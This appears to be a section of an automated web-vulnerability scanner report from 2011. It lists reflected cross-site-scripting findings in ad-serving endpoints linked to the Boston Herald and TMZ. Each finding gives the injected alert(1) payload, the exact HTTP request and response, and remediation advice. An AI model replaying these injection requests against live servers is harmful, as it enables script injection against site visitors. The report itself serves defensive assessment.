var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30323483817_1316222419","http://ad.doubleclick.net/adj/q1.bosherald5fae6'-alert(1)-'317c5c0c938/ent_fr;net=q1;u=,q1-30323483817_1316222419,12298b058f07061,ent,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=336916;contx=ent;dc=s;btg=;ord=1813138297??","300","250",true);</scr'+'ipt>
...[SNIP]...

4.34. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0fe9'-alert(1)-'e1c69b32c7b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald/ent_frb0fe9'-alert(1)-'e1c69b32c7b;sz=300x250;net=q1;ord=1813138297?;env=ifr;ord1=336916;cmpgurl=http%253A//bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 01:20:21 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30419507438_1316222421","http://ad.doubleclick.net/adj/q1.bosherald/ent_frb0fe9'-alert(1)-'e1c69b32c7b;net=q1;u=,q1-30419507438_1316222421,12298b058f07061,ent,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=336916;contx=ent;dc=s;btg=;ord=1813138297??","300","250",true);</scr'+'ipt>
...[SNIP]...

4.35. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df0e3'-alert(1)-'44b07b60aae was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The response is served as application/x-javascript, so the injected code runs in the origin of whichever page includes this URL in a script tag (here the Boston Herald ad frame named in the Referer); "Certain" refers to the reflection, and exploiting it still requires getting a page on the target origin to load the script URL with an attacker-chosen sz value.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. sz is a creative size (300x250 in the legitimate request), so validate it against a strict pattern such as ^\d+x\d+$ and reject anything else. Where a free-form value must be placed in a JavaScript string literal, escape it for that context (quotes, backslash, <, / and line terminators as \xHH or \uHHHH sequences) at the point where the literal is built; HTML encoding does not help inside a script, and the later document.write cannot repair a literal that has already been broken out of.

Request

GET /cmadj/q1.bosherald/ent_fr;sz=df0e3'-alert(1)-'44b07b60aae HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7329
Date: Sat, 17 Sep 2011 01:20:07 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
age="Javascript">CollectiveMedia.createAndAttachAd("q1-30421855631_1316222407","http://ad.doubleclick.net/adj/q1.bosherald/ent_fr;net=q1;u=,q1-30421855631_1316222407,12298b058f07061,none,;;cmw=nurl;sz=df0e3'-alert(1)-'44b07b60aae;contx=none;dc=s;btg=?","df0e3'-alert(1)-'44b07b60aae","",true);</scr'+'ipt>
...[SNIP]...

4.36. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/news

Issue detail

The value of REST URL parameter 1 (the first path segment, cmadj) is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8832c'-alert(1)-'b89805fab1f was submitted in that path segment. This input was echoed unmodified in the application's response, inside the DoubleClick URL passed to createAndAttachAd; as in 4.35, the surrounding <scr'+'ipt> block is a single-quoted literal being assembled for document.write, so the quote in the payload terminates it. The server still answered 200 with a complete ad tag although the first segment no longer named a valid handler.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. The three path segments are routing data (the handler name cmadj, a site key such as q1.bosherald and a section such as news), not free-form input: match each against the server's list of known values and return an error for anything else instead of copying the requested path into the generated DoubleClick URL. The same check covers 4.37 and 4.38. Where a value genuinely has to be placed in a JavaScript string literal, escape it for that context (quotes, backslash, <, / and line terminators as \xHH or \uHHHH) when the literal is built.

Request

GET /cmadj8832c'-alert(1)-'b89805fab1f/q1.bosherald/news;sz=728x90;net=q1;ord=354527464?;env=ifr;ord1=736181;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7353
Date: Sat, 17 Sep 2011 01:09:53 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30423216503_1316221793","http://ad.doubleclick.net/adj8832c'-alert(1)-'b89805fab1f/q1.bosherald/news;net=q1;u=,q1-30423216503_1316221793,12298b058f07061,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464??","728","90",true);</scr'+'ipt>
...[SNIP]...

4.37. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/news

Issue detail

The value of REST URL parameter 2 (the second path segment, the site key q1.bosherald) is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbba4'-alert(1)-'e84b40c6dcb was submitted in that path segment. This input was echoed unmodified in the application's response, inside the DoubleClick URL passed to createAndAttachAd, within the single-quoted document.write literal described in 4.35.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Same root cause and fix as 4.36: the site key is routing data, so match it against the known list rather than echoing it, and escape anything that must be written into a JavaScript string literal for that context.

Request

GET /cmadj/q1.bosheralddbba4'-alert(1)-'e84b40c6dcb/news;sz=728x90;net=q1;ord=354527464?;env=ifr;ord1=736181;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7353
Date: Sat, 17 Sep 2011 01:09:54 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30101077229_1316221794","http://ad.doubleclick.net/adj/q1.bosheralddbba4'-alert(1)-'e84b40c6dcb/news;net=q1;u=,q1-30101077229_1316221794,12298b058f07061,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464??","728","90",true);</scr'+'ipt>
...[SNIP]...

4.38. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/news

Issue detail

The value of REST URL parameter 3 (the third path segment, the section name news) is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f033d'-alert(1)-'85ce176899a was submitted in that path segment. This input was echoed unmodified in the application's response, inside the DoubleClick URL passed to createAndAttachAd, within the single-quoted document.write literal described in 4.35.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Same root cause and fix as 4.36: the section name is routing data, so match it against the known list rather than echoing it, and escape anything that must be written into a JavaScript string literal for that context.

Request

GET /cmadj/q1.bosherald/newsf033d'-alert(1)-'85ce176899a;sz=728x90;net=q1;ord=354527464?;env=ifr;ord1=736181;cmpgurl=http%253A//www.bostonherald.com/news/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7353
Date: Sat, 17 Sep 2011 01:09:54 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30223795082_1316221794","http://ad.doubleclick.net/adj/q1.bosherald/newsf033d'-alert(1)-'85ce176899a;net=q1;u=,q1-30223795082_1316221794,12298b058f07061,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464??","728","90",true);</scr'+'ipt>
...[SNIP]...

4.39. http://a.collective-media.net/cmadj/q1.bosherald/news [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48057'-alert(1)-'6d221538d81 was submitted in the sz parameter. This input was echoed unmodified in the application's response, twice: inside the DoubleClick URL and again as the width argument of createAndAttachAd, within the single-quoted document.write literal described in 4.35.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Same fix as 4.35: validate sz against ^\d+x\d+$ and reject anything else, and escape any value that must be written into a JavaScript string literal for that context at the point where the literal is built.

Request

GET /cmadj/q1.bosherald/news;sz=48057'-alert(1)-'6d221538d81 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7327
Date: Sat, 17 Sep 2011 01:09:50 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
guage="Javascript">CollectiveMedia.createAndAttachAd("q1-30113229668_1316221790","http://ad.doubleclick.net/adj/q1.bosherald/news;net=q1;u=,q1-30113229668_1316221790,12298b058f07061,none,;;cmw=nurl;sz=48057'-alert(1)-'6d221538d81;contx=none;dc=s;btg=?","48057'-alert(1)-'6d221538d81","",true);</scr'+'ipt>
...[SNIP]...

4.40. http://ad.yieldmanager.com/imp [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72a06'%3balert(1)//5908bbe03b7 was submitted in the u parameter; the server URL-decoded %3b, so it was echoed as 72a06';alert(1)//5908bbe03b7 in the application's response. Two details matter for the fix: the request carries u twice and the server used the second copy, and the reflected value is the argument of escape(), which only runs after the literal has been parsed and so cannot undo the break-out. The trailing // comments out the rest of the line, so the payload does not even need to repair the string.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. u is a URL that the page later passes to escape(); do the encoding on the server when the literal is emitted instead, either by percent-encoding the URL (including ' ( ) which encodeURIComponent-style encoders leave alone) or by escaping it for a JavaScript string literal. Client-side escape() applied to an already-parsed literal is not a control. Treat duplicate parameters as an error rather than letting the last copy win.

Request

GET /imp?anmember=514&anprice=&Z=300x250&s=2298003&r=1&_salt=1576960469&u=http%3A%2F%2Fwww.tmz.com%2F&u=http://www.tmz.com/72a06'%3balert(1)//5908bbe03b7 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!$%00!!#RS!$XpC!1R*F!%`E+!!!!$!?5%!)H`@:!wVd.!%FMM!'lGU!'m1A~~~~~=4jht=6h5P~"; ih="b!!!!>!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1R*F!!!!#=4jht!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2/j6!!!!#=4qsr!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!3e]N!!!!#=4X$w!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; 
bh="b!!!#v!!-C,!!!!%=3`c_!!-G2!!!!%=5$1G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!$=57ob!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4u!!!!#=54Pi!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!x^1!!!!$=5,??!!y)?!!!!#=3*$x!##!)!!!!$=5#lv!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#6]*!!!!$=5#lv!#7wf!!!!#=51w'!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q/x!!!!#=5,(/!#Q]:!!!!#=4YXv!#Q_h!!!!$=3gb9!#QoI!!!!#=5,',!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#T<,!!!!$=5,??!#UD`!!!!$=3**U!#UL(!!!!#=5$1H!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!$=4X0s!#eCK!!!!$=4X0s!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#qq%!!!!#=4jf'!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#v5N!!!!$=5#lm!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$'.I!!!!$=5$1G!$'.K!!!!#=5$1G!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-`?!!!!#=4jeq!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#
=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!)=4_L-!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:jo!!!!%=5,9,!$<DI!!!!#=3G@^!$<Rh!!!!#=5$$X!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:54:43 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0341.rm.sp2
Set-Cookie: ih="b!!!!#!3e$^!!!!C=57qT"; path=/; expires=Mon, 16-Sep-2013 00:54:43 GMT
Set-Cookie: vuday1=8ac=%N5HGH?9-O6; path=/; expires=Sun, 18-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!#!$7w.!!%f!!%d(@!3e$^!'/%f!!mT+~)I#RI!ZmB)!(XE3!(Gex~~~~~~=57qT=9K[_!!.vL"; path=/; expires=Mon, 16-Sep-2013 00:54:43 GMT
Set-Cookie: liday1=x6!2#N5HGH:SAxO; path=/; expires=Sun, 18-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 00:54:43 GMT
Pragma: no-cache
Content-Length: 2619
Content-Type: application/x-javascript
Age: 1
Proxy-Connection: close

document.write('<span id="10288627">');
//raw JavaScript
document.write('<scr'+'ipt language=\'javascr'+'ipt\' type=\'text/javascr'+'ipt\' src=\'http://imp.fetchback.com/serve/fb/adtag.js?tid=6832
...[SNIP]...
d = '261950';
var asci_publiid = '3449146';
var asci_sectid = '2298003';
var asci_advliid = '3329023';
var asci_cid = '10288627';
var asci_p = '99';
var asci_refurl = escape('http://www.tmz.com/72a06';alert(1)//5908bbe03b7');
if ( asci_refurl.length >
...[SNIP]...

4.41. http://adnxs.revsci.net/imp [Z parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks: the document.write('<scr'+'ipt ... src="..."') literal. The payload 906f3'-alert(1)-'8a5c815ddd2 was submitted in the Z parameter. This input was echoed unmodified into the size parameter of the generated src URL, while the same value is correctly percent-encoded (%27-alert%281%29-%27) where it is copied into the nested redir parameter, so the server already has a suitable encoder and simply does not apply it to every component.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. Z is a creative size; validate it against ^\d+x\d+$. Apply the percent-encoding already used for redir to every component of the generated URL, and then escape the complete URL for the single-quoted JavaScript literal it is written into. The response is served as text/javascript, so the injected code runs in the origin of the page that includes this URL in a script tag.

Request

GET /imp?Z=300x250906f3'-alert(1)-'8a5c815ddd2&s=2298003&r=1&_salt=1576960469&u=http%3A%2F%2Fwww.tmz.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 00:52:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 00:52:50 GMT
Content-Length: 454

